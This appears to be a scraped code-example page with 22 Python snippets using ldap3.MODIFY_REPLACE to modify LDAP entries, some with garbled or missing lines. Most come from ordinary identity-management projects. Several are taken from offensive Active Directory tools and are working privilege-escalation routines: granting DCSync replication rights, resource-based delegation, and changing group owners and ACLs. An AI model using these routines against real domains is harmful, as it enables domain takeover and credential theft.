Python ldap3.MODIFY_REPLACE Examples
The following are 22
code examples of ldap3.MODIFY_REPLACE().
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Example #1
Source File: From privacyidea with GNU Affero General Public License v3.0 | 6 votes |
def _create_ldap_modify_changes(self, attributes, uid): """ Identifies if an LDAP attribute already exists and if the value needs to be updated, deleted or added. :param attributes: Attributes to be updated :type attributes: dict :param uid: The uid of the user object in the resolver :type uid: basestring :return: dict with attribute name as keys and values """ modify_changes = {} uinfo = self.getUserInfo(uid) for fieldname, value in attributes.items(): if value: if fieldname in uinfo: modify_changes[fieldname] = [MODIFY_REPLACE, [value]] else: modify_changes[fieldname] = [MODIFY_ADD, [value]] else: modify_changes[fieldname] = [MODIFY_DELETE, [value]] return modify_changes
Example #2
Source File: From CVE-2019-1040 with MIT License | 5 votes |
def remove_owner(ldapconnection, data): # Set SD flags to only query for owner controls = security_descriptor_control(sdflags=0x01) usersid = data['old_owner_sid']['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) if secDesc['OwnerSid'].formatCanonical() == usersid: print_m('%s is owned by the same user as before exploitation, skipping' % data['target_dn']) return True secDesc['OwnerSid'] = LDAP_SID() secDesc['OwnerSid'].fromCanonical(usersid) secdesc_data = secDesc.getData() res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [secdesc_data])}, controls=controls) if res: print_o('Owner restore succesful') return True else: # Constraintintersection means we can't change the owner to this SID # TODO: investigate why this is and possible workarounds if ldapconnection.result['result'] == 19: print_f('Failed to change owner of group %s to %s. This is a known limitation, please restore the owner manually.' % (data['target_dn'], usersid)) # Treat this as a success return True raise RestoreException('Failed to change owner of group %s to %s: %s' % (data['target_dn'], usersid, str(ldapconnection.result)))
Example #3
Source File: From community-edition-setup with MIT License | 5 votes |
def installRadius(): tmp_dir = os.path.join(setupObj.staticFolder, 'radius', 'templates') radius_ldif_fp = os.path.join(tmp_dir, 'gluu_radius_server.ldif') setupObj.renderTemplateInOut( os.path.join(radius_ldif_fp), tmp_dir, os.path.join(ces_dir, 'output'), ) setupObj.install_gluu_radius()[setupObj.cmd_chown, 'radius:gluu', os.path.join(setupObj.certFolder, 'gluu-radius.private-key.pem')])[setupObj.cmd_chmod, '660', os.path.join(setupObj.certFolder, 'gluu-radius.private-key.pem')]) dn, oxAuthConfiguration = get_oxAuthConfiguration_ldap() oxAuthConfiguration['openidScopeBackwardCompatibility'] = True oxAuthConfiguration['legacyIdTokenClaims'] = True oxAuthConfiguration_js = json.dumps(oxAuthConfiguration, indent=2) ldap_conn.modify( dn, {"oxAuthConfDynamic": [ldap3.MODIFY_REPLACE, oxAuthConfiguration_js]} ) ldap_conn.modify( 'ou=configuration,o=gluu', {"gluuRadiusEnabled": [ldap3.MODIFY_REPLACE, 'true']} ) ldap_conn.modify( 'inum=B8FD-4C11,ou=scripts,o=gluu', {"oxEnabled": [ldap3.MODIFY_REPLACE, 'true']} )
Example #4
Source File: From lego with MIT License | 5 votes |
def change_password(self, uid, password_hash): dn = ",".join((f"uid={uid}", self.user_base)) changes = {"userPassword": [(MODIFY_REPLACE, ["{CRYPT}" + password_hash])]} self.connection.modify(dn, changes)
Example #5
Source File: From lego with MIT License | 5 votes |
def update_group_members(self, cn, members): dn = ",".join((f"cn={cn}", self.group_base)) if members: changes = {"memberUid": [(MODIFY_REPLACE, members)]} else: changes = {"memberUid": [(MODIFY_DELETE, [])]} self.connection.modify(dn, changes)
Example #6
Source File: From CVE-2019-1040 with MIT License | 5 votes |
def remove_domain_sync(ldapconnection, data): # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) usersid = data['target_sid']['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) old_sd = binascii.unhexlify(data['old_sd']) if secDescData == old_sd: print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn']) return True new_sd = binascii.unhexlify(data['new_sd']) if secDescData != new_sd: accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS # these are the GUIDs of the get-changes and get-changes-all extended attributes if RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and \ RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype): print_m('Removing ACE using manual approach') replace_sd = secDesc.getData() else: raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn']) else: # We can simply restore the old SD since the current SD is identical to the one after our modification print_i('Removing ACE using SD restore approach') replace_sd = old_sd res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls) if res: print_o('Domain Sync privileges restored successfully') return True else: raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result)))
Example #7
Source File: From CVE-2019-1040 with MIT License | 5 votes |
def remove_addmember_privs(ldapconnection, data): # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) usersid = data['target_sid']['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) old_sd = binascii.unhexlify(data['old_sd']) if secDescData == old_sd: print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn']) return True new_sd = binascii.unhexlify(data['new_sd']) if secDescData != new_sd: # Manual operation accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype): print_m('Removing ACE using manual approach') replace_sd = secDesc.getData() else: raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn']) else: # We can simply restore the old SD since the current SD is identical to the one after our modification print_i('Removing ACE using SD restore approach') replace_sd = old_sd res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls) if res: print_o('AddMember privileges restored successfully') return True else: raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result)))
Example #8
Source File: From with MIT License | 5 votes |
def remove_addmember_privs(ldapconnection, data): # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) usersid = data['target_sid']['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) old_sd = binascii.unhexlify(data['old_sd']) if secDescData == old_sd: print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn']) return True new_sd = binascii.unhexlify(data['new_sd']) if secDescData != new_sd: # Manual operation accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype): print_m('Removing ACE using manual approach') replace_sd = secDesc.getData() else: raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn']) else: # We can simply restore the old SD since the current SD is identical to the one after our modification print_m('Removing ACE using SD restore approach') replace_sd = old_sd res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls) if res: print_o('AddMember privileges restored successfully') return True else: raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result)))
Example #9
Source File: From with MIT License | 4 votes |
def remove_domain_sync(ldapconnection, data): # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) usersid = data['target_sid']['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) old_sd = binascii.unhexlify(data['old_sd']) if secDescData == old_sd: print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn']) return True new_sd = binascii.unhexlify(data['new_sd']) if secDescData != new_sd: accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS # these are the GUIDs of the get-changes and get-changes-all extended attributes if RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and \ RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype): print_m('Removing ACE using manual approach') replace_sd = secDesc.getData() else: raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn']) else: # We can simply restore the old SD since the current SD is identical to the one after our modification print_m('Removing ACE using SD restore approach') replace_sd = old_sd res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls) if res: print_o('Domain Sync privileges restored successfully') return True else: raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result)))
Example #10
Source File: From resilient-community-apps with MIT License | 4 votes |
def _ldap_utilities_set_password_function(self, event, *args, **kwargs): """Function: A function that allows you to set a new password for an LDAP entry given the entry's DN""" log = logging.getLogger(__name__) try: yield StatusMessage("Starting ldap_utilities_set_password") # Instansiate helper (which gets appconfigs from file) helper = LDAPUtilitiesHelper(self.options) yield StatusMessage("Appconfig Settings OK") # Get function inputs input_ldap_dn = helper.get_function_input(kwargs, "ldap_dn") # text (required) input_ldap_new_password = helper.get_function_input(kwargs, "ldap_new_password") # text (required) yield StatusMessage("Function Inputs OK") # Instansiate LDAP Server and Connection c = helper.get_ldap_connection() try: # Bind to the connection c.bind() except Exception as err: raise ValueError("Cannot connect to LDAP Server. Ensure credentials are correct\n Error: {0}".format(err)) # Inform user msg = "" if helper.LDAP_IS_ACTIVE_DIRECTORY: msg = "Connected to {0}".format("Active Directory") else: msg = "Connected to {0}".format("LDAP Server") yield StatusMessage(msg) res = False try: yield StatusMessage("Attempting to change password") if helper.LDAP_IS_ACTIVE_DIRECTORY: res =, input_ldap_new_password) else: res = c.modify(input_ldap_dn, {'userPassword': [(MODIFY_REPLACE, [input_ldap_new_password])]}) except Exception: raise ValueError("Could not change password. Check input_ldap_dn and input_ldap_new_password are valid") finally: # Unbind connection c.unbind() results = { "success": res, "user_dn": input_ldap_dn }"Completed") # Produce a FunctionResult with the results yield FunctionResult(results) except Exception: yield FunctionError()
Example #11
Source File: From CVE-2019-1040 with MIT License | 4 votes |
def aclAttack(self, userDn, domainDumper): global alreadyEscalated if alreadyEscalated: LOG.error('ACL attack already performed. Refusing to continue') return # Dictionary for restore data restoredata = {} # Query for the sid of our user, '(objectCategory=user)', attributes=['sAMAccountName', 'objectSid']) entry = self.client.entries[0] username = entry['sAMAccountName'].value usersid = entry['objectSid'].value LOG.debug('Found sid for user %s: %s' % (username, usersid)) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) alreadyEscalated = True'Querying domain security descriptor'), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid)) secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid)) dn = entry.entry_dn data = secDesc.getData() self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if self.client.result['result'] == 0: alreadyEscalated = True LOG.critical( 'Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)'Try using DCSync with and this user :)') config.set_priv(True) # Query the SD again to see what AD made of it, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] # Save this to restore the SD later on restoredata['target_dn'] = dn restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True self.writeRestoreData(restoredata, dn) return True else: LOG.error('Error when updating ACL: %s' % self.client.result) return False
Example #12
Source File: From CVE-2019-1040 with MIT License | 4 votes |
def delegateAttack(self, usersam, targetsam, domainDumper): global delegatePerformed if targetsam in delegatePerformed:'Delegate attack already performed for this computer, skipping') return if not usersam: usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper) self.config.escalateuser = usersam # Get escalate user sid result = self.getUserInfo(domainDumper, usersam) if not result: LOG.error('User to escalate does not exist!') return escalate_sid = str(result[1]) # Get target computer DN result = self.getUserInfo(domainDumper, targetsam) if not result: LOG.error('Computer to modify does not exist! (wrong domain?)') return target_dn = result[0], '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName','objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity']) targetuser = None for entry in self.client.response: if entry['type'] != 'searchResEntry': continue targetuser = entry if not targetuser: LOG.error('Could not query target user properties') return try: sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0]) LOG.debug('Currently allowed sids:') for ace in sd['Dacl'].aces: LOG.debug(' %s' % ace['Ace']['Sid'].formatCanonical()) except IndexError: # Create DACL manually sd = create_empty_sd() sd['Dacl'].aces.append(create_allow_ace(escalate_sid)) self.client.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity':[ldap3.MODIFY_REPLACE, [sd.getData()]]}) if self.client.result['result'] == 0:'Delegation rights modified succesfully!')'%s can now impersonate users on %s via S4U2Proxy', usersam, targetsam) delegatePerformed.append(targetsam) else: if self.client.result['result'] == 50: LOG.error('Could not modify object, the server reports insufficient rights: %s', self.client.result['message']) elif self.client.result['result'] == 19: LOG.error('Could not modify object, the server reports a constrained violation: %s', self.client.result['message']) else: LOG.error('The server returned an error: %s', self.client.result['message']) return
Example #13
Source File: From treadmill with Apache License 2.0 | 4 votes |
def _diff_entries(old_entry, new_entry): """Diff the entries and produce a diff dictionary suitable for update.""" # Adapted from python-ldap ( modlist # diff = {} attrtype_lower_map = {} for attr in old_entry.keys(): attrtype_lower_map[attr.lower()] = attr for attrtype in new_entry.keys(): attrtype_lower = attrtype.lower() # Filter away null-strings new_values = [ value for value in new_entry[attrtype] if value is not None ] if attrtype_lower in attrtype_lower_map: old_values = old_entry.get(attrtype_lower_map[attrtype_lower], []) old_values = [ value for value in old_values if value is not None ] del attrtype_lower_map[attrtype_lower] else: old_values = [] if not old_values and new_values: # Add a new attribute to entry diff.setdefault(attrtype, []).append( (ldap3.MODIFY_ADD, new_values) ) elif old_values and new_values: # Replace existing attribute if _diff_attribute_values(old_values, new_values): diff.setdefault(attrtype, []).append( (ldap3.MODIFY_REPLACE, new_values)) elif old_values and not new_values: # Completely delete an existing attribute diff.setdefault(attrtype, []).append( (ldap3.MODIFY_DELETE, [])) # Remove all attributes of old_entry which are not present # in new_entry at all for attr in attrtype_lower_map: attrtype = attrtype_lower_map[attr] diff.setdefault(attrtype, []).append((ldap3.MODIFY_DELETE, [])) return diff
Example #14
Source File: From Slackor with GNU General Public License v3.0 | 4 votes |
def aclAttack(self, userDn, domainDumper): global alreadyEscalated if alreadyEscalated: LOG.error('ACL attack already performed. Refusing to continue') return # Dictionary for restore data restoredata = {} # Query for the sid of our user, '(objectCategory=user)', attributes=['sAMAccountName', 'objectSid']) entry = self.client.entries[0] username = entry['sAMAccountName'].value usersid = entry['objectSid'].value LOG.debug('Found sid for user %s: %s' % (username, usersid)) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) alreadyEscalated = True'Querying domain security descriptor'), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid)) secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid)) dn = entry.entry_dn data = secDesc.getData() self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if self.client.result['result'] == 0: alreadyEscalated = True'Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)'Try using DCSync with and this user :)') # Query the SD again to see what AD made of it, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] # Save this to restore the SD later on restoredata['target_dn'] = dn restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True self.writeRestoreData(restoredata, dn) return True else: LOG.error('Error when updating ACL: %s' % self.client.result) return False
Example #15
Source File: From Slackor with GNU General Public License v3.0 | 4 votes |
def delegateAttack(self, usersam, targetsam, domainDumper): global delegatePerformed if targetsam in delegatePerformed:'Delegate attack already performed for this computer, skipping') return if not usersam: usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper) self.config.escalateuser = usersam # Get escalate user sid result = self.getUserInfo(domainDumper, usersam) if not result: LOG.error('User to escalate does not exist!') return escalate_sid = str(result[1]) # Get target computer DN result = self.getUserInfo(domainDumper, targetsam) if not result: LOG.error('Computer to modify does not exist! (wrong domain?)') return target_dn = result[0], '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName','objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity']) targetuser = None for entry in self.client.response: if entry['type'] != 'searchResEntry': continue targetuser = entry if not targetuser: LOG.error('Could not query target user properties') return try: sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0]) LOG.debug('Currently allowed sids:') for ace in sd['Dacl'].aces: LOG.debug(' %s' % ace['Ace']['Sid'].formatCanonical()) except IndexError: # Create DACL manually sd = create_empty_sd() sd['Dacl'].aces.append(create_allow_ace(escalate_sid)) self.client.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity':[ldap3.MODIFY_REPLACE, [sd.getData()]]}) if self.client.result['result'] == 0:'Delegation rights modified succesfully!')'%s can now impersonate users on %s via S4U2Proxy', usersam, targetsam) delegatePerformed.append(targetsam) else: if self.client.result['result'] == 50: LOG.error('Could not modify object, the server reports insufficient rights: %s', self.client.result['message']) elif self.client.result['result'] == 19: LOG.error('Could not modify object, the server reports a constrained violation: %s', self.client.result['message']) else: LOG.error('The server returned an error: %s', self.client.result['message']) return
Example #16
Source File: From Exchange2domain with MIT License | 4 votes |
def aclAttack(self, userDn, domainDumper): global alreadyEscalated if alreadyEscalated: LOG.error('ACL attack already performed. Refusing to continue') return # Dictionary for restore data restoredata = {} # Query for the sid of our user, '(objectCategory=user)', attributes=['sAMAccountName', 'objectSid']) entry = self.client.entries[0] username = entry['sAMAccountName'].value usersid = entry['objectSid'].value LOG.debug('Found sid for user %s: %s' % (username, usersid)) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) alreadyEscalated = True'Querying domain security descriptor'), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid)) secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid)) dn = entry.entry_dn data = secDesc.getData() self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if self.client.result['result'] == 0: alreadyEscalated = True LOG.critical( 'Success! User %s now has Replication-Get-Changes-All privileges on the domain' % username)'Try using DCSync with and this user :)') config.set_priv(True), '(&(objectCategory=domain))', attributes=[ 'SAMAccountName', 'nTSecurityDescriptor'], controls=controls) entry = self.client.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] # Save this to restore the SD later on restoredata['target_dn'] = dn restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True self.writeRestoreData(restoredata, dn) return True else: LOG.error('Error when updating ACL: %s' % self.client.result) return False
Example #17
Source File: From insightconnect-plugins with MIT License | 4 votes |
def run(self, params={}): conn = self.connection.conn dn = params.get('distinguished_name') dn = ADUtils.dn_normalize(dn) temp_list = ADUtils.dn_escape_and_split(dn) dc_list = [s for s in temp_list if 'DC' in s] dc = ','.join(dc_list) escaped_dn = ','.join(temp_list) pairs = ADUtils.find_parentheses_pairs(escaped_dn) # replace ( and ) when they are part of a name rather than a search parameter if pairs: for key, value in pairs.items(): tempstring = escaped_dn if tempstring.find('=', key, value) == -1: escaped_dn = escaped_dn[:value] + '\\29' + escaped_dn[value + 1:] escaped_dn = escaped_dn[:key] + '\\28' + escaped_dn[key + 1:], search_filter=f'(distinguishedName={escaped_dn})', attributes=['userAccountControl'] ) results = conn.response dn_test = [d['dn'] for d in results if 'dn' in d] try: dn_test[0] except Exception as ex: self.logger.error('The DN ' + dn + ' was not found') raise PluginException(cause='The DN was not found', assistance='The DN ' + dn + ' was not found') from ex user_list = [d["attributes"] for d in results if "attributes" in d] user_control = user_list[0] try: account_status = user_control['userAccountControl'] except Exception as ex: self.logger.error('The DN ' + dn + ' is not a user') raise PluginException(cause='The DN is not a user', assistance='The DN ' + dn + ' is not a user') from ex user_account_flag = 2 account_status = account_status & ~user_account_flag conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]}) result = conn.result output = result['description'] if result['result'] == 0: return {'success': True} self.logger.error('failed: error message %s' % output) return {'success': False}
Example #18
Source File: From with MIT License | 4 votes |
def write_owner(ldapconnection, state, user_sam, group_bh_name): # Query for the sid of our target user userdn, usersid = get_object_info(ldapconnection, user_sam) # Set SD flags to only query for owner controls = security_descriptor_control(sdflags=0x01) group_sam = get_sam_name(group_bh_name) # Dictionary for restore data restoredata = {}, '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) if secDesc['OwnerSid'].formatCanonical() == usersid: print_m('%s is already owned by %s, skipping' % (group_sam, user_sam)) return True # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid restoredata['old_owner_sid'] = secDesc['OwnerSid'].formatCanonical() # Modify the sid secDesc['OwnerSid'] = LDAP_SID() secDesc['OwnerSid'].fromCanonical(usersid) dn = entry.entry_dn restoredata['target_dn'] = dn data = secDesc.getData() res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if res: print_o('Owner change successful') restoredata['success'] = True state.push_history('write_owner', restoredata) return True else: restoredata['success'] = False state.push_history('write_owner', restoredata) raise ExploitException('Failed to change owner of group %s to %s: %s' % (dn, userdn, str(ldapconnection.result)))
Example #19
Source File: From with MIT License | 4 votes |
def add_addmember_privs(ldapconnection, state, user_sam, group_bh_name): # Query for the sid of our target user userdn, usersid = get_object_info(ldapconnection, user_sam) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) # Dictionary for restore data restoredata = {} # print_m('Querying group security descriptor') group_sam = get_sam_name(group_bh_name), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] secDescData = entry['nTSecurityDescriptor'].raw_values[0] secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid # We need "write property" here to write to the "member" attribute accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP # this is the GUID of the Member attribute secDesc['Dacl']['Data'].append(create_object_ace('bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype)) dn = entry.entry_dn restoredata['target_dn'] = dn data = secDesc.getData() res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if res: print_o('Dacl modification successful') # Query the SD again to see what AD made of it, '(objectClass=*)', search_scope=ldap3.BASE , attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] newSecDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=newSD) # Save this to restore the SD later on restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True state.push_history('add_addmember_privs', restoredata) return True else: restoredata['success'] = False state.push_history('add_addmember_privs', restoredata) # filter out already exists? raise ExploitException('Failed to add WriteMember privs for %s to group %s: %s' % (userdn, dn, str(ldapconnection.result)))
Example #20
Source File: From with MIT License | 4 votes |
def add_domain_sync(ldapconnection, state, user_sam, domain_name): # Query for the sid of our target user userdn, usersid = get_object_info(ldapconnection, user_sam) # Set SD flags to only query for DACL controls = security_descriptor_control(sdflags=0x04) # Dictionary for restore data restoredata = {} # print_m('Querying domain security descriptor'), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] # This shouldn't happen but lets be sure just in case if ldap2domain(entry.entry_dn).upper() != domain_name.upper(): raise ExploitException('Wrong domain! LDAP returned the domain %s but escalation was requested to %s' % (ldap2domain(entry.entry_dn).upper(), domain_name.upper())) secDescData = entry['nTSecurityDescriptor'].raw_values[0] # Save old SD for restore purposes restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8') restoredata['target_sid'] = usersid secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData) # We need "control access" here for the extended attribute accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS # these are the GUIDs of the get-changes and get-changes-all extended attributes secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype)) secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype)) dn = entry.entry_dn restoredata['target_dn'] = dn data = secDesc.getData() res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls) if res: print_o('Dacl modification successful') # Query the SD again to see what AD made of it, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls) entry = ldapconnection.entries[0] newSD = entry['nTSecurityDescriptor'].raw_values[0] # Save this to restore the SD later on restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8') restoredata['success'] = True state.push_history('add_domain_sync', restoredata) return True else: restoredata['success'] = False state.push_history('add_domain_sync', restoredata) raise ExploitException('Failed to add DCSync privs to %s: %s' % (userdn, str(ldapconnection.result)))
Example #21
Source File: From insightconnect-plugins with MIT License | 4 votes |
def run(self, params={}): conn = self.connection.conn dn = params.get('distinguished_name') dn = ADUtils.dn_normalize(dn) temp_list = ADUtils.dn_escape_and_split(dn) dc_list = [s for s in temp_list if 'DC' in s] dc = ','.join(dc_list) escaped_dn = ','.join(temp_list) pairs = ADUtils.find_parentheses_pairs(escaped_dn) # replace ( and ) when they are part of a name rather than a search parameter if pairs: for key, value in pairs.items(): tempstring = escaped_dn if tempstring.find('=', key, value) == -1: escaped_dn = escaped_dn[:value] + '\\29' + escaped_dn[value + 1:] escaped_dn = escaped_dn[:key] + '\\28' + escaped_dn[key + 1:], search_filter=f'(distinguishedName={escaped_dn})', attributes=['userAccountControl'] ) results = conn.response dn_test = [d['dn'] for d in results if 'dn' in d] try: dn_test[0] except Exception as ex: self.logger.error('The DN ' + escaped_dn + ' was not found') raise PluginException(cause="The DN was not found", assistance="The DN " + escaped_dn + " was not found") from ex user_list = [d['attributes'] for d in results if 'attributes' in d] user_control = user_list[0] try: account_status = user_control['userAccountControl'] except Exception as ex: self.logger.error('The DN ' + escaped_dn + ' is 